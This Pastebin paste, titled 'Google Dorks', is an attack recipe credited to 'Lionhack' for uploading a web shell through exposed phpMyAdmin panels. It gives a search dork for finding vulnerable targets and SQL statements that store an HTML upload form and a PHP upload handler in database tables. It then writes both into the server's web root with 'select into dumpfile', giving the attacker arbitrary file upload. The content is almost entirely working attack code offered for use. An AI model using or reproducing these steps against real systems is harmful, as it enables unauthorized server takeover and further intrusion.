API tools faq
paste
enderphan

Google Dorks

enderphan
Mar 16th, 2016
82
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.31 KB | None | 0 0
raw download clone embed print report
  1. Upload shell via Phpmyadmin by Lionhack - from Hackerschool fr and Altui.
  2.  
  3.  
  4.  
  5. Dorks : allinurl:index.php?db=information_schema
  6.  
  7.  
  8.  
  9. CREATE TABLE `DB NAME`.`userform` (
  10. `track1` VARCHAR( 1000 ) NOT NULL
  11. ) ENGINE = MYISAM ;
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19. ...........................................................
  20. CREATE TABLE `DB NAME`.`user_upload` (
  21. `track2` VARCHAR( 1000 ) NOT NULL
  22. ) ENGINE = MYISAM ;
  23. ............................................................
  24.  
  25.  
  26.  
  27.  
  28.  
  29. insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  30.  
  31. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  32. <html xmlns="http://www.w3.org/1999/xhtml">
  33. <head>
  34. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  35. <title>HackerSchool Fr - Altui</title>
  36. </head>
  37. <body bgcolor="white">
  38. <div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
  39. ">&gt;&gt; &nbsp; *HackerSchool Fr - Altui* Upload Your file </div>
  40. <div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
  41. <form enctype="multipart/form-data" action="upload.php" method="post">
  42. <input name="userfile" type="file" />&nbsp;
  43. <input type="submit" value="Upload" />
  44. </form>
  45. </div>
  46. </body>
  47. </html>');
  48.  
  49.  
  50. ......................................................................
  51.  
  52. select * into dumpfile '/opt/lampp/htdocs/filename.php' from userform
  53. .......................................................................
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66. INSERT INTO user_upload
  67. VALUES (
  68. "<?php $uploaddir = '/opt/lampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if
  69.  
  70. (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div
  71.  
  72. align=center><font size=5 color=#ff0000>HackerSchool fr- Altui | uploaded successfully</font></body>'; } else { print '<body
  73.  
  74. bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000>HackerSchool fr- Altui| Error !
  75. </font> <marquee> Lionhack </marquee> </body>'; } ?> "
  76. )
  77.  
  78.  
  79.  
  80.  
  81. ........................................................................
  82. select * into dumpfile '/opt/lampp/htdocs/upload.php' from user_upload
  83. ........................................................................
  84.  
  85.  
  86.  
  87.  
  88. NB: /opt/lampp/htdocs/ ... is the website
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!